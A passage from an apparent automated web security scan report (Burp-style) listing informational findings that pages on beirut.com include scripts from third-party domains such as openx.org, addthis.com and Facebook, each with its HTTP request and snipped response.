  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Tourism-and-Guides/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:40:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.618. http://www.beirut.com/Online-Internet/Weather-Environment/8954751592

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Weather-Environment/8954751592

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Weather-Environment/8954751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.619. http://www.beirut.com/Recreations/Amusement-Centers/478536232

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Amusement-Centers/478536232

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Amusement-Centers/478536232 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.620. http://www.beirut.com/Recreations/Arcade-Centers/707176335

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Arcade-Centers/707176335

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Arcade-Centers/707176335 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.621. http://www.beirut.com/Recreations/Beach-Clubs/67326046

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Beach-Clubs/67326046

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Beach-Clubs/67326046 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.622. http://www.beirut.com/Recreations/Bowling-Centers/93987864

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Bowling-Centers/93987864

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Bowling-Centers/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:35:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.623. http://www.beirut.com/Recreations/Golf-Clubs/926389688

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Golf-Clubs/926389688

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Golf-Clubs/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.624. http://www.beirut.com/Recreations/Horseback-Riding/6888394074

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Horseback-Riding/6888394074

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Horseback-Riding/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.625. http://www.beirut.com/Recreations/Play-Centers/83897013

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Play-Centers/83897013

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Play-Centers/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:37:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.626. http://www.beirut.com/Recreations/Pool-Halls/2561106634

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Pool-Halls/2561106634

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Pool-Halls/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:39:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.627. http://www.beirut.com/Recreations/Public-Beaches/075078389

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Public-Beaches/075078389

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Public-Beaches/075078389 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:43:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.628. http://www.beirut.com/Recreations/Theme-Parks/4635732484

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Theme-Parks/4635732484

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Theme-Parks/4635732484 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:46:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.629. http://www.beirut.com/Recreations/Yacht-Clubs/6501142

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Recreations/Yacht-Clubs/6501142

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Recreations/Yacht-Clubs/6501142 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
